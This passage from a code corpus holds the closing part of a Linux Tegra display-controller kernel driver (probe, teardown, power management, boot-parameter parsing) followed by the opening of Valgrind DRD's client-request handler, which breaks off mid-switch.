	specs.modedb = kcalloc(specs.modedb_len,
			       sizeof(struct fb_videomode), GFP_KERNEL);
	if (!specs.modedb)
		return;

	for (i = 0; i < dc->out->n_modes; i++)
		tegra_dc_to_fb_videomode(&specs.modedb[i],
					 &dc->out->modes[i]);

	tegra_fb_update_monspecs(dc->fb, &specs, NULL);
	kfree(specs.modedb);
}
#if CONFIG_ESD_READ_TE
/* Reset the LCD panel via the DSI path of the primary head (g_dc). */
void tegra_dc_te_reset_lcd(void)
{
	tegra_dc_dsi_reset_lcd(g_dc);
}
EXPORT_SYMBOL(tegra_dc_te_reset_lcd);

/* Schedule the TE/ESD reset work item on the primary head. */
void tegra_run_resetwork(void)
{
	schedule_work(&g_dc->reset_work_te);
}

/* Work handler: performs the actual LCD reset. */
static void tegra_reset_work(struct work_struct *work)
{
	tegra_dc_te_reset_lcd();
}
#endif
static int tegra_dc_probe(struct platform_device *ndev)
{
struct tegra_dc *dc;
struct tegra_dc_mode *mode;
struct clk *clk;
struct clk *emc_clk;
struct resource *res;
struct resource *base_res;
struct resource *fb_mem = NULL;
int ret = 0;
void __iomem *base;
int irq;
int i;
if (!ndev->dev.platform_data) {
dev_err(&ndev->dev, "no platform data\n");
return -ENOENT;
}
dc = kzalloc(sizeof(struct tegra_dc), GFP_KERNEL);
if (!dc) {
dev_err(&ndev->dev, "can't allocate memory for tegra_dc\n");
return -ENOMEM;
}
irq = platform_get_irq_byname(ndev, "irq");
if (irq <= 0) {
dev_err(&ndev->dev, "no irq\n");
ret = -ENOENT;
goto err_free;
}
res = platform_get_resource_byname(ndev, IORESOURCE_MEM, "regs");
if (!res) {
dev_err(&ndev->dev, "no mem resource\n");
ret = -ENOENT;
goto err_free;
}
base_res = request_mem_region(res->start, resource_size(res),
ndev->name);
if (!base_res) {
dev_err(&ndev->dev, "request_mem_region failed\n");
ret = -EBUSY;
goto err_free;
}
base = ioremap(res->start, resource_size(res));
if (!base) {
dev_err(&ndev->dev, "registers can't be mapped\n");
ret = -EBUSY;
goto err_release_resource_reg;
}
if (TEGRA_DISPLAY_BASE == res->start) {
dc->vblank_syncpt = NVSYNCPT_VBLANK0;
dc->win_syncpt[0] = NVSYNCPT_DISP0_A;
dc->win_syncpt[1] = NVSYNCPT_DISP0_B;
dc->win_syncpt[2] = NVSYNCPT_DISP0_C;
dc->powergate_id = TEGRA_POWERGATE_DISA;
} else if (TEGRA_DISPLAY2_BASE == res->start) {
dc->vblank_syncpt = NVSYNCPT_VBLANK1;
dc->win_syncpt[0] = NVSYNCPT_DISP1_A;
dc->win_syncpt[1] = NVSYNCPT_DISP1_B;
dc->win_syncpt[2] = NVSYNCPT_DISP1_C;
dc->powergate_id = TEGRA_POWERGATE_DISB;
} else {
dev_err(&ndev->dev,
"Unknown base address %#08x: unable to assign syncpt\n",
res->start);
}
fb_mem = platform_get_resource_byname(ndev, IORESOURCE_MEM, "fbmem");
clk = clk_get(&ndev->dev, NULL);
if (IS_ERR_OR_NULL(clk)) {
dev_err(&ndev->dev, "can't get clock\n");
ret = -ENOENT;
goto err_iounmap_reg;
}
emc_clk = clk_get(&ndev->dev, "emc");
if (IS_ERR_OR_NULL(emc_clk)) {
dev_err(&ndev->dev, "can't get emc clock\n");
ret = -ENOENT;
goto err_put_clk;
}
dc->clk = clk;
dc->emc_clk = emc_clk;
dc->shift_clk_div.mul = dc->shift_clk_div.div = 1;
/* Initialize one shot work delay, it will be assigned by dsi
* according to refresh rate later. */
dc->one_shot_delay_ms = 40;
dc->base_res = base_res;
dc->base = base;
dc->irq = irq;
dc->ndev = ndev;
dc->pdata = ndev->dev.platform_data;
/*
* The emc is a shared clock, it will be set based on
* the requirements for each user on the bus.
*/
dc->emc_clk_rate = 0;
mutex_init(&dc->lock);
mutex_init(&dc->one_shot_lock);
init_completion(&dc->frame_end_complete);
init_waitqueue_head(&dc->wq);
init_waitqueue_head(&dc->timestamp_wq);
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
INIT_WORK(&dc->reset_work, tegra_dc_reset_worker);
#endif
#if CONFIG_ESD_READ_TE
{
static int initflag = 0;
if(initflag == 0)
{
INIT_WORK(&dc->reset_work_te, tegra_reset_work);
initflag = 1;
}
}
#endif
INIT_WORK(&dc->vblank_work, tegra_dc_vblank);
dc->vblank_ref_count = 0;
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
INIT_WORK(&dc->vpulse2_work, tegra_dc_vpulse2);
#endif
dc->vpulse2_ref_count = 0;
INIT_DELAYED_WORK(&dc->underflow_work, tegra_dc_underflow_worker);
INIT_DELAYED_WORK(&dc->one_shot_work, tegra_dc_one_shot_worker);
tegra_dc_init_lut_defaults(&dc->fb_lut);
dc->n_windows = DC_N_WINDOWS;
for (i = 0; i < dc->n_windows; i++) {
struct tegra_dc_win *win = &dc->windows[i];
win->idx = i;
win->dc = dc;
tegra_dc_init_csc_defaults(&win->csc);
tegra_dc_init_lut_defaults(&win->lut);
}
ret = tegra_dc_set(dc, ndev->id);
if (ret < 0) {
dev_err(&ndev->dev, "can't add dc\n");
goto err_put_emc_clk;
}
platform_set_drvdata(ndev, dc);
#ifdef CONFIG_SWITCH
dc->modeset_switch.name = dev_name(&ndev->dev);
dc->modeset_switch.state = 0;
dc->modeset_switch.print_state = switch_modeset_print_mode;
ret = switch_dev_register(&dc->modeset_switch);
if (ret < 0)
dev_err(&ndev->dev, "failed to register switch driver\n");
#endif
tegra_dc_feature_register(dc);
if (dc->pdata->default_out)
tegra_dc_set_out(dc, dc->pdata->default_out);
else
dev_err(&ndev->dev, "No default output specified. Leaving output disabled.\n");
dc->mode_dirty = false; /* ignore changes tegra_dc_set_out has done */
dc->ext = tegra_dc_ext_register(ndev, dc);
if (IS_ERR_OR_NULL(dc->ext)) {
dev_warn(&ndev->dev, "Failed to enable Tegra DC extensions.\n");
dc->ext = NULL;
}
/* interrupt handler must be registered before tegra_fb_register() */
if (request_threaded_irq(irq, NULL, tegra_dc_irq, IRQF_ONESHOT,
dev_name(&ndev->dev), dc)) {
dev_err(&ndev->dev, "request_irq %d failed\n", irq);
ret = -EBUSY;
goto err_disable_dc;
}
disable_dc_irq(dc);
if (dc->pdata->flags & TEGRA_DC_FLAG_ENABLED) {
_tegra_dc_set_default_videomode(dc);
dc->enabled = _tegra_dc_enable(dc);
}
tegra_dc_create_debugfs(dc);
dev_info(&ndev->dev, "probed\n");
if (dc->pdata->fb) {
if (dc->enabled && dc->pdata->fb->bits_per_pixel == -1) {
unsigned long fmt;
tegra_dc_writel(dc,
WINDOW_A_SELECT << dc->pdata->fb->win,
DC_CMD_DISPLAY_WINDOW_HEADER);
fmt = tegra_dc_readl(dc, DC_WIN_COLOR_DEPTH);
dc->pdata->fb->bits_per_pixel =
tegra_dc_fmt_bpp(fmt);
}
mode = tegra_dc_get_override_mode(dc);
if (mode) {
dc->pdata->fb->xres = mode->h_active;
dc->pdata->fb->yres = mode->v_active;
}
tegra_dc_io_start(dc);
dc->fb = tegra_fb_register(ndev, dc, dc->pdata->fb, fb_mem);
tegra_dc_io_end(dc);
if (IS_ERR_OR_NULL(dc->fb)) {
dc->fb = NULL;
dev_err(&ndev->dev, "failed to register fb\n");
goto err_remove_debugfs;
}
}
if (dc->out && dc->out->n_modes)
tegra_dc_add_modes(dc);
if (dc->out && dc->out->hotplug_init)
dc->out->hotplug_init(&ndev->dev);
if (dc->out_ops && dc->out_ops->detect)
dc->out_ops->detect(dc);
else
dc->connected = true;
/* Powergate display module when it's unconnected. */
if (!tegra_dc_get_connected(dc))
tegra_dc_powergate_locked(dc);
tegra_dc_create_sysfs(&dc->ndev->dev);
return 0;
err_remove_debugfs:
tegra_dc_remove_debugfs(dc);
free_irq(irq, dc);
err_disable_dc:
if (dc->ext) {
tegra_dc_ext_disable(dc->ext);
tegra_dc_ext_unregister(dc->ext);
}
mutex_lock(&dc->lock);
if (dc->enabled)
_tegra_dc_disable(dc);
dc->enabled = false;
mutex_unlock(&dc->lock);
#ifdef CONFIG_SWITCH
switch_dev_unregister(&dc->modeset_switch);
#endif
err_put_emc_clk:
clk_put(emc_clk);
err_put_clk:
clk_put(clk);
err_iounmap_reg:
iounmap(base);
if (fb_mem)
release_resource(fb_mem);
err_release_resource_reg:
release_resource(base_res);
err_free:
kfree(dc);
return ret;
}
/*
 * Platform-device remove: tear down everything tegra_dc_probe() set
 * up, in reverse order.
 *
 * Fix: the register-aperture resource (dc->base_res) was only released
 * when an fbmem resource happened to exist — a copy/paste of the fb_mem
 * guard above it. base_res is requested unconditionally in probe, so it
 * must be released unconditionally here; the old code leaked the
 * register region on heads without an "fbmem" resource.
 */
static int __devexit tegra_dc_remove(struct platform_device *ndev)
{
	struct tegra_dc *dc = platform_get_drvdata(ndev);

	tegra_dc_remove_sysfs(&dc->ndev->dev);
	tegra_dc_remove_debugfs(dc);

	if (dc->fb) {
		tegra_fb_unregister(dc->fb);
		if (dc->fb_mem)
			release_resource(dc->fb_mem);
	}

	tegra_dc_ext_disable(dc->ext);
	if (dc->ext)
		tegra_dc_ext_unregister(dc->ext);

	mutex_lock(&dc->lock);
	if (dc->enabled)
		_tegra_dc_disable(dc);
	dc->enabled = false;
	mutex_unlock(&dc->lock);
	synchronize_irq(dc->irq); /* wait for IRQ handlers to finish */

#ifdef CONFIG_SWITCH
	switch_dev_unregister(&dc->modeset_switch);
#endif
	free_irq(dc->irq, dc);
	clk_put(dc->emc_clk);
	clk_put(dc->clk);
	iounmap(dc->base);
	release_resource(dc->base_res);
	kfree(dc);
	tegra_dc_set(NULL, ndev->id);

	return 0;
}
#ifdef CONFIG_PM
/*
 * PM suspend: disable the extension client, run the output's suspend
 * hook, power the head down and mark it suspended, then run the
 * postsuspend hook. The extra 100 ms sleep for HDMI avoids a spurious
 * resume event caused by the falling voltage.
 */
static int tegra_dc_suspend(struct platform_device *ndev, pm_message_t state)
{
	struct tegra_dc *dc = platform_get_drvdata(ndev);

	trace_display_suspend(dc);
	dev_info(&ndev->dev, "suspend\n");

	tegra_dc_ext_disable(dc->ext);

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);

	if (dc->out_ops && dc->out_ops->suspend)
		dc->out_ops->suspend(dc);

	if (dc->enabled) {
		_tegra_dc_disable(dc);

		/* dc->enabled stays true: resume re-enables the head */
		dc->suspended = true;
	}

	if (dc->out && dc->out->postsuspend) {
		dc->out->postsuspend();
		if (dc->out->type && dc->out->type == TEGRA_DC_OUT_HDMI)
			/*
			 * avoid resume event due to voltage falling
			 */
			msleep(100);
	}

	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
	synchronize_irq(dc->irq); /* wait for IRQ handlers to finish */

	return 0;
}
/*
 * PM resume: clear the suspended flag, reset framebuffer panning, and
 * — if the head was logically enabled — reprogram the default video
 * mode and re-enable the controller, then run the hotplug and resume
 * hooks of the output.
 */
static int tegra_dc_resume(struct platform_device *ndev)
{
	struct tegra_dc *dc = platform_get_drvdata(ndev);

	trace_display_resume(dc);
	dev_info(&ndev->dev, "resume\n");

	mutex_lock(&dc->lock);
	dc->suspended = false;

	/* To pan the fb on resume */
	tegra_fb_pan_display_reset(dc->fb);

	if (dc->enabled) {
		/* clear then recompute: _tegra_dc_enable reports success */
		dc->enabled = false;
		_tegra_dc_set_default_videomode(dc);
		dc->enabled = _tegra_dc_enable(dc);
	}

	if (dc->out && dc->out->hotplug_init)
		dc->out->hotplug_init(&ndev->dev);

	if (dc->out_ops && dc->out_ops->resume)
		dc->out_ops->resume(dc);
	mutex_unlock(&dc->lock);

	return 0;
}
#endif /* CONFIG_PM */
/* Platform shutdown hook: blank and disable the head if it is active. */
static void tegra_dc_shutdown(struct platform_device *ndev)
{
	struct tegra_dc *dc = platform_get_drvdata(ndev);

	if (dc && dc->enabled) {
		tegra_dc_blank(dc);
		tegra_dc_disable(dc);
	}
}
/*
 * Debug module-parameter writer: "dump" dumps the registers of head 0;
 * "suspend"/"resume" drive the PM callbacks directly.
 *
 * NOTE(review): assumes tegra_dcs[0] is non-NULL by the time the
 * parameter is written — confirm probe ordering guarantees this.
 */
extern int suspend_set(const char *val, struct kernel_param *kp)
{
	if (!strcmp(val, "dump"))
		dump_regs(tegra_dcs[0]);
#ifdef CONFIG_PM
	else if (!strcmp(val, "suspend"))
		tegra_dc_suspend(tegra_dcs[0]->ndev, PMSG_SUSPEND);
	else if (!strcmp(val, "resume"))
		tegra_dc_resume(tegra_dcs[0]->ndev);
#endif

	return 0;
}
/* Reads of the debug "suspend" parameter return an empty value. */
extern int suspend_get(char *buffer, struct kernel_param *kp)
{
	return 0;
}

/* Backing variable for the write-only debug "suspend" module parameter. */
int suspend;

module_param_call(suspend, suspend_set, suspend_get, &suspend, 0644);
/* Platform driver glue for the "tegradc" devices (one per head). */
struct platform_driver tegra_dc_driver = {
	.driver = {
		.name = "tegradc",
		.owner = THIS_MODULE,
	},
	.probe = tegra_dc_probe,
	.remove = tegra_dc_remove,
#ifdef CONFIG_PM
	.suspend = tegra_dc_suspend,
	.resume = tegra_dc_resume,
#endif
	.shutdown = tegra_dc_shutdown,
};
#ifndef MODULE
/*
 * Parse 11 comma-separated integers from @options into @mode, in this
 * order: pclk, h_active, v_active, h_ref_to_sync, v_ref_to_sync,
 * h_sync_width, v_sync_width, h_back_porch, v_back_porch,
 * h_front_porch, v_front_porch.
 *
 * Returns 0 on success, -EINVAL when fewer than 11 fields are present
 * or pclk parses to 0.
 *
 * Fix: params[] was uninitialized, so an empty field (e.g.
 * "74250,,720") left the corresponding slot indeterminate and copied
 * garbage into the mode — zero-initialize the array so empty fields
 * mean 0.
 */
static int __init parse_disp_params(char *options, struct tegra_dc_mode *mode)
{
	int i, params[11] = { 0 };
	char *p;

	for (i = 0; i < ARRAY_SIZE(params); i++) {
		if ((p = strsep(&options, ",")) != NULL) {
			if (*p)
				params[i] = simple_strtoul(p, &p, 10);
		} else
			return -EINVAL;
	}

	if ((mode->pclk = params[0]) == 0)
		return -EINVAL;

	mode->h_active      = params[1];
	mode->v_active      = params[2];
	mode->h_ref_to_sync = params[3];
	mode->v_ref_to_sync = params[4];
	mode->h_sync_width  = params[5];
	mode->v_sync_width  = params[6];
	mode->h_back_porch  = params[7];
	mode->v_back_porch  = params[8];
	mode->h_front_porch = params[9];
	mode->v_front_porch = params[10];

	return 0;
}
/*
 * Kernel command line handler:
 *   disp_params=hdmi:<11 params>;rgb:<...>;dsi:<...>
 * Each present section overrides the default mode for the matching
 * output type via parse_disp_params(). Sections are optional and may
 * appear in any order; returns -EINVAL on a malformed section.
 */
static int __init tegra_dc_mode_override(char *str)
{
	char *p = str, *options;

	if (!p || !*p)
		return -EINVAL;

	p = strstr(str, "hdmi:");
	if (p) {
		p += 5;		/* skip "hdmi:" */
		options = strsep(&p, ";");
		if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_HDMI]))
			return -EINVAL;
	}

	p = strstr(str, "rgb:");
	if (p) {
		p += 4;		/* skip "rgb:" */
		options = strsep(&p, ";");
		if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_RGB]))
			return -EINVAL;
	}

	p = strstr(str, "dsi:");
	if (p) {
		p += 4;		/* skip "dsi:" */
		options = strsep(&p, ";");
		if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_DSI]))
			return -EINVAL;
	}

	return 0;
}
__setup("disp_params=", tegra_dc_mode_override);
#endif
/*
 * Module init: bring up the DC extension module first, then register
 * the platform driver.
 *
 * Fix: if platform_driver_register() failed, the already-initialized
 * extension module was never torn down; unwind it on the error path so
 * a failed load leaves no residue.
 */
static int __init tegra_dc_module_init(void)
{
	int ret = tegra_dc_ext_module_init();

	if (ret)
		return ret;

	ret = platform_driver_register(&tegra_dc_driver);
	if (ret)
		tegra_dc_ext_module_exit();

	return ret;
}
/* Module exit: unregister the driver, then tear down the ext module
 * (reverse of tegra_dc_module_init()). */
static void __exit tegra_dc_module_exit(void)
{
	platform_driver_unregister(&tegra_dc_driver);
	tegra_dc_ext_module_exit();
}
module_exit(tegra_dc_module_exit);
module_init(tegra_dc_module_init);
| gpl-2.0 |
percy-g2/Novathor_xperia_u8500 | 6.1.1.B.1.54/external/valgrind/main/drd/drd_clientreq.c | 3 | 16145 | /* -*- mode: C; c-basic-offset: 3; -*- */
/*
This file is part of drd, a thread error detector.
Copyright (C) 2006-2010 Bart Van Assche <bvanassche@acm.org>.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307, USA.
The GNU General Public License is contained in the file COPYING.
*/
#include "drd_barrier.h"
#include "drd_clientreq.h"
#include "drd_cond.h"
#include "drd_error.h"
#include "drd_hb.h"
#include "drd_load_store.h"
#include "drd_malloc_wrappers.h"
#include "drd_mutex.h"
#include "drd_rwlock.h"
#include "drd_semaphore.h"
#include "drd_suppression.h" // drd_start_suppression()
#include "drd_thread.h"
#include "pub_tool_basics.h" // Bool
#include "pub_tool_debuginfo.h" // VG_(describe_IP)()
#include "pub_tool_libcassert.h"
#include "pub_tool_libcassert.h" // tl_assert()
#include "pub_tool_libcprint.h" // VG_(message)()
#include "pub_tool_machine.h" // VG_(get_SP)()
#include "pub_tool_threadstate.h"
#include "pub_tool_tooliface.h" // VG_(needs_...)()
/* Local function declarations. */
static Bool handle_client_request(ThreadId vg_tid, UWord* arg, UWord* ret);
/* Function definitions. */
/**
* Tell the Valgrind core the address of the DRD function that processes
* client requests. Must be called before any client code is run.
*/
void DRD_(clientreq_init)(void)
{
   /* Register handle_client_request() as this tool's client-request hook. */
   VG_(needs_client_requests)(handle_client_request);
}
/**
* DRD's handler for Valgrind client requests. The code below handles both
* DRD's public and tool-internal client requests.
*/
/*
 * Dispatch one Valgrind client request. arg[0] selects the request and
 * arg[1..] carry its operands. Returns True when the request was
 * recognized (with *ret set to the reply value, 0 for most requests)
 * and False otherwise so that other handlers may process it.
 *
 * The DRD_(thread_enter_synchr)() / DRD_(thread_leave_synchr)()
 * nesting counter seen below makes a synchronization request a no-op
 * when it is triggered recursively from inside the implementation of
 * another synchronization primitive.
 */
static Bool handle_client_request(ThreadId vg_tid, UWord* arg, UWord* ret)
{
   UWord result = 0;
   const DrdThreadId drd_tid = DRD_(thread_get_running_tid)();

   tl_assert(vg_tid == VG_(get_running_tid()));
   tl_assert(DRD_(VgThreadIdToDrdThreadId)(vg_tid) == drd_tid);

   switch (arg[0])
   {
   /* Custom-allocator annotations. */
   case VG_USERREQ__MALLOCLIKE_BLOCK:
      if (arg[1])
         DRD_(malloclike_block)(vg_tid, arg[1]/*addr*/, arg[2]/*size*/);
      break;

   case VG_USERREQ__FREELIKE_BLOCK:
      if (arg[1] && ! DRD_(freelike_block)(vg_tid, arg[1]/*addr*/))
      {
         GenericErrInfo GEI = {
            .tid = DRD_(thread_get_running_tid)(),
            .addr = 0,
         };
         VG_(maybe_record_error)(vg_tid,
                                 GenericErr,
                                 VG_(get_IP)(vg_tid),
                                 "Invalid VG_USERREQ__FREELIKE_BLOCK request",
                                 &GEI);
      }
      break;

   /* Thread identification and naming. */
   case VG_USERREQ__DRD_GET_VALGRIND_THREAD_ID:
      result = vg_tid;
      break;

   case VG_USERREQ__DRD_GET_DRD_THREAD_ID:
      result = drd_tid;
      break;

   case VG_USERREQ__DRD_SET_THREAD_NAME:
      DRD_(thread_set_name)(drd_tid, (const char*)arg[1]);
      break;

   /* Address-range suppression; Helgrind's equivalents are accepted too. */
   case VG_USERREQ__DRD_START_SUPPRESSION:
      /*_VG_USERREQ__HG_ARANGE_MAKE_UNTRACKED*/
   case VG_USERREQ_TOOL_BASE('H','G') + 256 + 39:
      DRD_(start_suppression)(arg[1], arg[1] + arg[2], "client");
      break;

   case VG_USERREQ__DRD_FINISH_SUPPRESSION:
      /*_VG_USERREQ__HG_ARANGE_MAKE_TRACKED*/
   case VG_USERREQ_TOOL_BASE('H','G') + 256 + 40:
      DRD_(finish_suppression)(arg[1], arg[1] + arg[2]);
      break;

   /* Happens-before / happens-after annotations. */
   case VG_USERREQ__DRD_ANNOTATE_HAPPENS_BEFORE:
      DRD_(hb_happens_before)(drd_tid, arg[1]);
      break;

   case VG_USERREQ__DRD_ANNOTATE_HAPPENS_AFTER:
      DRD_(hb_happens_after)(drd_tid, arg[1]);
      break;

   /*
    * User-level rwlock annotations. Each one is ignored when the
    * annotated address is actually a known spinlock (spinlocks are
    * handled through the mutex requests instead).
    */
   case VG_USERREQ__DRD_ANNOTATE_RWLOCK_CREATE:
      if (arg[1])
      {
         struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
         if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
            break;
      }
      DRD_(rwlock_pre_init)(arg[1], user_rwlock);
      break;

   case VG_USERREQ__DRD_ANNOTATE_RWLOCK_DESTROY:
      if (arg[1])
      {
         struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
         if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
            break;
      }
      DRD_(rwlock_post_destroy)(arg[1], user_rwlock);
      break;

   case VG_USERREQ__DRD_ANNOTATE_RWLOCK_ACQUIRED:
      if (arg[1])
      {
         struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
         if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
            break;
      }
      /* arg[2] must be a canonical boolean: 1 = write lock, 0 = read lock */
      tl_assert(arg[2] == !! arg[2]);
      if (arg[2])
      {
         DRD_(rwlock_pre_wrlock)(arg[1], user_rwlock);
         DRD_(rwlock_post_wrlock)(arg[1], user_rwlock, True);
      }
      else
      {
         DRD_(rwlock_pre_rdlock)(arg[1], user_rwlock);
         DRD_(rwlock_post_rdlock)(arg[1], user_rwlock, True);
      }
      break;

   case VG_USERREQ__DRD_ANNOTATE_RWLOCK_RELEASED:
      if (arg[1])
      {
         struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
         if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
            break;
      }
      tl_assert(arg[2] == !! arg[2]);
      DRD_(rwlock_pre_unlock)(arg[1], user_rwlock);
      break;

   case VG_USERREQ__SET_PTHREAD_COND_INITIALIZER:
      DRD_(pthread_cond_initializer) = (Addr)arg[1];
      DRD_(pthread_cond_initializer_size) = arg[2];
      break;

   /* Segment, tracing and load/store recording control. */
   case VG_USERREQ__DRD_START_NEW_SEGMENT:
      DRD_(thread_new_segment)(DRD_(PtThreadIdToDrdThreadId)(arg[1]));
      break;

   case VG_USERREQ__DRD_START_TRACE_ADDR:
      DRD_(start_tracing_address_range)(arg[1], arg[1] + arg[2]);
      break;

   case VG_USERREQ__DRD_STOP_TRACE_ADDR:
      DRD_(stop_tracing_address_range)(arg[1], arg[1] + arg[2]);
      break;

   case VG_USERREQ__DRD_RECORD_LOADS:
      DRD_(thread_set_record_loads)(drd_tid, arg[1]);
      break;

   case VG_USERREQ__DRD_RECORD_STORES:
      DRD_(thread_set_record_stores)(drd_tid, arg[1]);
      break;

   /* Thread lifecycle requests. */
   case VG_USERREQ__SET_PTHREADID:
      // pthread_self() returns 0 for programs not linked with libpthread.so.
      if (arg[1] != INVALID_POSIX_THREADID)
         DRD_(thread_set_pthreadid)(drd_tid, arg[1]);
      break;

   case VG_USERREQ__SET_JOINABLE:
      DRD_(thread_set_joinable)(DRD_(PtThreadIdToDrdThreadId)(arg[1]),
                                (Bool)arg[2]);
      break;

   case VG_USERREQ__ENTERING_PTHREAD_CREATE:
      DRD_(thread_entering_pthread_create)(drd_tid);
      break;

   case VG_USERREQ__LEFT_PTHREAD_CREATE:
      DRD_(thread_left_pthread_create)(drd_tid);
      break;

   case VG_USERREQ__POST_THREAD_JOIN:
   {
      const DrdThreadId thread_to_join = DRD_(PtThreadIdToDrdThreadId)(arg[1]);
      if (thread_to_join == DRD_INVALID_THREADID)
      {
         InvalidThreadIdInfo ITI = { DRD_(thread_get_running_tid)(), arg[1] };
         VG_(maybe_record_error)(vg_tid,
                                 InvalidThreadId,
                                 VG_(get_IP)(vg_tid),
                                 "pthread_join(): invalid thread ID",
                                 &ITI);
      }
      else
      {
         DRD_(thread_post_join)(drd_tid, thread_to_join);
      }
      break;
   }

   case VG_USERREQ__PRE_THREAD_CANCEL:
   {
      const DrdThreadId thread_to_cancel = DRD_(PtThreadIdToDrdThreadId)(arg[1]);
      if (thread_to_cancel == DRD_INVALID_THREADID)
      {
         InvalidThreadIdInfo ITI = { DRD_(thread_get_running_tid)(), arg[1] };
         VG_(maybe_record_error)(vg_tid,
                                 InvalidThreadId,
                                 VG_(get_IP)(vg_tid),
                                 "pthread_cancel(): invalid thread ID",
                                 &ITI);
      }
      else
      {
         DRD_(thread_pre_cancel)(thread_to_cancel);
      }
      break;
   }

   case VG_USERREQ__POST_THREAD_CANCEL:
      break;

   /* Mutex requests. */
   case VG_USERREQ__PRE_MUTEX_INIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(mutex_init)(arg[1], arg[2]);
      break;

   case VG_USERREQ__POST_MUTEX_INIT:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_MUTEX_DESTROY:
      DRD_(thread_enter_synchr)(drd_tid);
      break;

   case VG_USERREQ__POST_MUTEX_DESTROY:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(mutex_post_destroy)(arg[1]);
      break;

   case VG_USERREQ__PRE_MUTEX_LOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(mutex_pre_lock)(arg[1], arg[2], arg[3]);
      break;

   case VG_USERREQ__POST_MUTEX_LOCK:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(mutex_post_lock)(arg[1], arg[2], False/*post_cond_wait*/);
      break;

   case VG_USERREQ__PRE_MUTEX_UNLOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(mutex_unlock)(arg[1], arg[2]);
      break;

   case VG_USERREQ__POST_MUTEX_UNLOCK:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_SPIN_INIT_OR_UNLOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(spinlock_init_or_unlock)(arg[1]);
      break;

   case VG_USERREQ__POST_SPIN_INIT_OR_UNLOCK:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   /* Condition-variable requests. */
   case VG_USERREQ__PRE_COND_INIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(cond_pre_init)(arg[1]);
      break;

   case VG_USERREQ__POST_COND_INIT:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_COND_DESTROY:
      DRD_(thread_enter_synchr)(drd_tid);
      break;

   case VG_USERREQ__POST_COND_DESTROY:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(cond_post_destroy)(arg[1]);
      break;

   case VG_USERREQ__PRE_COND_WAIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
      {
         const Addr cond = arg[1];
         const Addr mutex = arg[2];
         const MutexT mutex_type = arg[3];
         /* waiting releases the mutex before blocking on the cond */
         DRD_(mutex_unlock)(mutex, mutex_type);
         DRD_(cond_pre_wait)(cond, mutex);
      }
      break;

   case VG_USERREQ__POST_COND_WAIT:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
      {
         const Addr cond = arg[1];
         const Addr mutex = arg[2];
         const Bool took_lock = arg[3];
         DRD_(cond_post_wait)(cond);
         DRD_(mutex_post_lock)(mutex, took_lock, True);
      }
      break;

   case VG_USERREQ__PRE_COND_SIGNAL:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(cond_pre_signal)(arg[1]);
      break;

   case VG_USERREQ__POST_COND_SIGNAL:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_COND_BROADCAST:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(cond_pre_broadcast)(arg[1]);
      break;

   case VG_USERREQ__POST_COND_BROADCAST:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   /* Semaphore requests. */
   case VG_USERREQ__PRE_SEM_INIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(semaphore_init)(arg[1], arg[2], arg[3]);
      break;

   case VG_USERREQ__POST_SEM_INIT:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_SEM_DESTROY:
      DRD_(thread_enter_synchr)(drd_tid);
      break;

   case VG_USERREQ__POST_SEM_DESTROY:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(semaphore_destroy)(arg[1]);
      break;

   case VG_USERREQ__PRE_SEM_OPEN:
      DRD_(thread_enter_synchr)(drd_tid);
      break;

   case VG_USERREQ__POST_SEM_OPEN:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(semaphore_open)(arg[1], (Char*)arg[2], arg[3], arg[4], arg[5]);
      break;

   case VG_USERREQ__PRE_SEM_CLOSE:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(semaphore_close)(arg[1]);
      break;

   case VG_USERREQ__POST_SEM_CLOSE:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_SEM_WAIT:
